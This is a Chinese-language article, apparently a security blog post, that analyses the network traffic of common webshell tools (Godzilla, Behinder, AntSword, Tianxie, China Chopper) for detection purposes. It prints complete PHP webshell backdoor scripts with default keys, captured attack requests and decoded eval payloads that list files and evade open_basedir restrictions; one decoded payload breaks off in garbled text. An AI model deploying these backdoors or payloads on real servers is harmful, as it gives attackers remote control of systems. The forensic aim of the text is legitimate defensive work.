【流量分析】常见webshell流量分析

免责声明：本文仅作分享！

对于常见的webshell工具，就要知攻善防；后门脚本的执行导致webshell的连接，对于默认的脚本要了解，才能更清晰，更方便应对。

（这里仅针对部分后门代码进行流量分析）

瑕疵处，请提出您宝贵的意见~

---

目录

哥斯拉流量

流量包

工具解密

冰蝎流量

后门代码

解密

蚁剑流量

流量包

数据传输方式

​编辑

天蝎流量

后门代码

工具解密：

菜刀流量

---

哥斯拉流量

3.x - 4.x:

要知道密码，密钥，才能将传输的密文转换为明文。

流量包

POST /uploads/shell.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Cookie: PHPSESSID=e30bpdvj90mp4gcgo3ukjcoa3t;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Host: 192.168.155.22
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 1413hacker=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7ciMmVDMjVDZ4AjMxYzNiNzNn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7ciclt2YhhGaoh2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&hhhhacker=LOk%2FNjEyMDhkNSj%2BeJf7%2B3gH5VBRUhj2NOUuZmUsfGZjsBh9HeAfF0virBj8q%2BMYHqr%2BeX0b5m%2FW%2B0pmZ1aAZACuehv4%2Bn%2FJL%2FkuVddg2HueKnpA%2F%2F39dah%2BYjCIqf6FYmI3Ng%3D%3DHTTP/1.1 200 OK
Host: 192.168.155.22
Date: Tue, 08 Oct 2024 08:57:26 GMT
Connection: close
X-Powered-By: PHP/8.2.23
Set-Cookie: PHPSESSID=e30bpdvj90mp4gcgo3ukjcoa3t; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-type: text/html; charset=UTF-87ba0e8f6b3da4a83LOk/NjEyMDhkNkj+fav75hiqH9YzMocx4BtpMDVm1f2ed56a3adc98dc

对传输的数据进行解密：

hacker=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7ciMmVDMjVDZ4AjMxYzNiNzNn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7ciclt2YhhGaoh2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&hhhhacker=LOk%2FNjEyMDhkNSj%2BeJf7%2B3gH5VBRUhj2NOUuZmUsfGZjsBh9HeAfF0virBj8q%2BMYHqr%2BeX0b5m%2FW%2B0pmZ1aAZACuehv4%2Bn%2FJL%2FkuVddg2HueKnpA%2F%2F39dah%2BYjCIqf6FYmI3Ng%3D%3D--->hacker=eval(base64_decode(strrev(urldecode('K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7ciMmVDMjVDZ4AjMxYzNiNzNn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7ciclt2YhhGaoh2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD'))));&hhhhacker=LOk/NjEyMDhkNSj+eJf7+3gH5VBRUhj2NOUuZmUsfGZjsBh9HeAfF0virBj8q+MYHqr+eX0b5m/W+0pmZ1aAZACuehv4+n/JL/kuVddg2HueKnpA//39dah+YjCIqf6FYmI3Ng==--->
DQpAc2Vzc2lvbl9zdGFydCgpOw0KQHNldF90aW1lX2xpbWl0KDApOw0KQGVycm9yX3JlcG9ydGluZygwKTsNCmZ1bmN0aW9uIGVuY29kZSgkRCwkSyl7DQogICAgZm9yKCRpPTA7JGk8c3RybGVuKCREKTskaSsrKSB7DQogICAgICAgICRjID0gJEtbJGkrMSYxNV07DQogICAgICAgICREWyRpXSA9ICREWyRpXV4kYzsNCiAgICB9DQogICAgcmV0dXJuICREOw0KfQ0KJHBhc3M9J2hoaGhhY2tlcic7DQokcGF5bG9hZE5hbWU9J3BheWxvYWQnOw0KJGtleT0nNzNiNzYxMjA4ZDVjMDVmMic7DQppZiAoaXNzZXQoJF9QT1NUWyRwYXNzXSkpew0KICAgICRkYXRhPWVuY29kZShiYXNlNjRfZGVjb2RlKCRfUE9TVFskcGFzc10pLCRrZXkpOw0KICAgIGlmIChpc3NldCgkX1NFU1NJT05bJHBheWxvYWROYW1lXSkpew0KICAgICAgICAkcGF5bG9hZD1lbmNvZGUoJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV0sJGtleSk7DQogICAgICAgIGlmIChzdHJwb3MoJHBheWxvYWQsImdldEJhc2ljc0luZm8iKT09PWZhbHNlKXsNCiAgICAgICAgICAgICRwYXlsb2FkPWVuY29kZSgkcGF5bG9hZCwka2V5KTsNCiAgICAgICAgfQ0KCQlldmFsKCRwYXlsb2FkKTsNCiAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRwYXNzLiRrZXkpLDAsMTYpOw0KICAgICAgICBlY2hvIGJhc2U2NF9lbmNvZGUoZW5jb2RlKEBydW4oJGRhdGEpLCRrZXkpKTsNCiAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRwYXNzLiRrZXkpLDE2KTsNCiAgICB9ZWxzZXsNCiAgICAgICAgaWYgKHN0cnBvcygkZGF0YSwiZ2V0QmFzaWNzSW5mbyIpIT09ZmFsc2Upew0KICAgICAgICAgICAgJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV09ZW5jb2RlKCRkYXRhLCRrZXkpOw0KICAgICAgICB9DQogICAgfQ0KfQ0K

继续解密，得后门脚本：

@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){for($i=0;$i<strlen($D);$i++) {$c = $K[$i+1&15];$D[$i] = $D[$i]^$c;}return $D;
}
$pass='hhhhacker';
$payloadName='payload';
$key='73b761208d5c05f2';
if (isset($_POST[$pass])){$data=encode(base64_decode($_POST[$pass]),$key);if (isset($_SESSION[$payloadName])){$payload=encode($_SESSION[$payloadName],$key);if (strpos($payload,"getBasicsInfo")===false){$payload=encode($payload,$key);}eval($payload);echo substr(md5($pass.$key),0,16);echo base64_encode(encode(@run($data),$key));echo substr(md5($pass.$key),16);}else{if (strpos($data,"getBasicsInfo")!==false){$_SESSION[$payloadName]=encode($data,$key);}}
}

----》得到

$pass='hhhhacker';

$key='73b761208d5c05f2';

在流量包中找传输的数据，进行相应的解密：

7ba0e8f6b3da4a83LOk/NjEyMDhkNtCBGq4a12ErNDRqF5fqqKn31KfS2Mf/wOPUPfWS1Bz2gcgHsZD9S7WdbBQcSwNKNdj0kcACNzNi1f2ed56a3adc98dc

工具解密

---

冰蝎流量

3.x：

base64 ，AES（iv + key）， base64   

后门代码

<?php
@error_reporting(0);
session_start();$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond$_SESSION['k']=$key;session_write_close();$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64_"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i++) {$post[$i] = $post[$i]^$key[$i+1&15]; }}else{$post=openssl_decrypt($post, "AES128", $key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p."");}}@call_user_func(new C(),$params);
?>

解密： base64 ，AES（iv + key）， base64

（IV默认为 0-9 a-f）

解密

---》 最后返回的数据，再base64一下即可。

---

蚁剑流量

流量包

POST /1.php HTTP/1.1
Host: 192.168.19.128
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 1668
Connection: closeraw=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7JG9wZGlyPUBpbmlfZ2V0KCJvcGVuX2Jhc2VkaXIiKTtpZigkb3BkaXIpIHskb2N3ZD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7JG9wYXJyPXByZWdfc3BsaXQoYmFzZTY0X2RlY29kZSgiTHp0OE9pOD0iKSwkb3BkaXIpO0BhcnJheV9wdXNoKCRvcGFyciwkb2N3ZCxzeXNfZ2V0X3RlbXBfZGlyKCkpO2ZvcmVhY2goJG9wYXJyIGFzICRpdGVtKSB7aWYoIUBpc193cml0YWJsZSgkaXRlbSkpe2NvbnRpbnVlO307JHRtZGlyPSRpdGVtLiIvLmI2OTdiZCI7QG1rZGlyKCR0bWRpcik7aWYoIUBmaWxlX2V4aXN0cygkdG1kaXIpKXtjb250aW51ZTt9JHRtZGlyPXJlYWxwYXRoKCR0bWRpcik7QGNoZGlyKCR0bWRpcik7QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsICIuLiIpOyRjbnRhcnI9QHByZWdfc3BsaXQoIi9cXFxcfFwvLyIsJHRtZGlyKTtmb3IoJGk9MDskaTxzaXplb2YoJGNudGFycik7JGkrKyl7QGNoZGlyKCIuLiIpO307QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsIi8iKTtAcm1kaXIoJHRtZGlyKTticmVhazt9O307O2Z1bmN0aW9uIGFzZW5jKCRvdXQpe3JldHVybiBAYmFzZTY0X2VuY29kZSgkb3V0KTt9O2Z1bmN0aW9uIGFzb3V0cHV0KCl7JG91dHB1dD1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTtlY2hvICIzOSIuIjM3MCI7ZWNobyBAYXNlbmMoJG91dHB1dCk7ZWNobyAiMzdkMGNlIi4iZDBlYWZiIjt9b2Jfc3RhcnQoKTt0cnl7JEQ9ZGlybmFtZSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pO2lmKCREPT0iIikkRD1kaXJuYW1lKCRfU0VSVkVSWyJQQVRIX1RSQU5TTEFURUQiXSk7JFI9InskRH0JIjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJDIiwiWiIpYXMgJEwpaWYoaXNfZGlyKCJ7JEx9OiIpKSRSLj0ieyRMfToiO31lbHNleyRSLj0iLyI7fSRSLj0iCSI7JHU9KGZ1bmN0aW9uX2V4aXN0cygicG9zaXhfZ2V0ZWdpZCIpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6IiI7JHM9KCR1KT8kdVsibmFtZSJdOkBnZXRfY3VycmVudF91c2VyKCk7JFIuPXBocF91bmFtZSgpOyRSLj0iCXskc30iO2VjaG8gJFI7O31jYXRjaChFeGNlcHRpb24gJGUpe2VjaG8gIkVSUk9SOi8vIi4kZS0%2BZ2V0TWVzc2FnZSgpO307YXNvdXRwdXQoKTtkaWUoKTs%3D&x=%40eval(%40base64_decode(%24_POST%5B'raw'%5D))%3B
HTTP/1.1 200 OK
Server: nginx/1.15.11
Date: Wed, 13 Nov 2024 03:13:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.2939370RDovcGhwc3R1ZHlfcHJvL1dXVy9kaWd1bwlDOkQ6CVdpbmRvd3MgTlQgREVTS1RPUC1QRVNMNURSIDYuMiBidWlsZCA5MjAwIChVbmtub3cgV2luZG93cyB2ZXJzaW9uIEJ1c2luZXNzIEVkaXRpb24pIGk1ODYJQWRtaW5pc3RyYXRvcg==37d0ced0eafb

解码：

（注意前几位为干扰字符）

@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.b697bd";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return @base64_encode($out);};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "39"."370";echo @asenc($output);echo "37d0ce"."d0eafb";}ob_start();try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D} ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.=" ";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.=" {$s}";echo $R;;}catch(Exception $e){echo "ERROR://".$e-6····5·····························

---

数据传输方式

--根据对应的编码，进行解码。

---

天蝎流量

后门代码

<?php
@error_reporting(0);
session_start();
$key="900bc885d7553375";
$_SESSION['k']=$key;
$post=file_get_contents("php://input");
if(isset($post))
{$datas=explode("\n",$post);$code=$datas[0];$t="base64_"."decode";$code=$t($code."");for($i=0;$i<strlen($code);$i++) {$code[$i] = $code[$i]^$key[$i+1&15]; }$arr=explode('|',$code);$func=$arr[0];if(isset($arr[1])){$p=$arr[1];class C{public function __construct($p) {eval($p."");}}@new C($p);}
}
?>

---》从中我们可以看出 key  ，base64 

密文：

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

工具解密：

再base64：

error_reporting(0);
header('Content-Type: text/html; charset=UTF-8');function getSafeStr($str){$s1 = iconv('utf-8','gbk//IGNORE',$str);$s0 = iconv('gbk','utf-8//IGNORE',$s1);if($s0 == $str){return $s0;}else{return iconv('gbk','utf-8//IGNORE',$str);}
}
function getgbkStr($str){$s0 = iconv('gbk','utf-8//IGNORE',$s1);$s1 = iconv('utf-8','gbk//IGNORE',$str);if($s1 == $str){return $s1;}else{return iconv('utf-8','gbk//IGNORE',$str);}
}function main($path = "")
{if (stristr(PHP_OS,"windows")||stristr(PHP_OS,"winnt")){for($i=65;$i<=90;$i++){$drive=chr($i).':\\';file_exists($drive) ? $driveList=$driveList.$drive.",":'';}}else{$driveList="/";}$currentPath=getcwd()."/";$result=$driveList."\r\n".$currentPath."\r\n";$path=getgbkStr($path);if($path == "") $path = getcwd()."/";$allFiles = scandir($path);foreach ($allFiles as $fileName) {$fullPath = $path . $fileName;if($fileName!='..'&&$fileName!='.'){if (!function_exists("mb_convert_encoding")){$fileName=getSafeStr($fileName);}else{$fileName=mb_convert_encoding($fileName, 'UTF-8', mb_detect_encoding($fileName, array("UTF-8","auto")));}if (is_file($fullPath)) {$result=$result.$fileName;} else {$result=$result."dic:".$fileName;}$result=$result."\t".filesize($fullPath);$result=$result."\t".substr(base_convert(@fileperms($fullPath),10,8),-4);$result=$result."\t".date("Y-m-d H:i:s", filemtime($fullPath))."\n";}}echo encrypt($result, $_SESSION['k']);        
}function encrypt($data,$key)
{for($i=0;$i<strlen($data);$i++) {$data[$i] = $data[$i]^$key[$i+1&15]; }return $data;
}
$randmystr="sfbygfxohbkbt";
main($path="C:/");

---

菜刀流量

主要就是一句话密码，base64

z0,z1,z2 等等 传输返回的数据。

---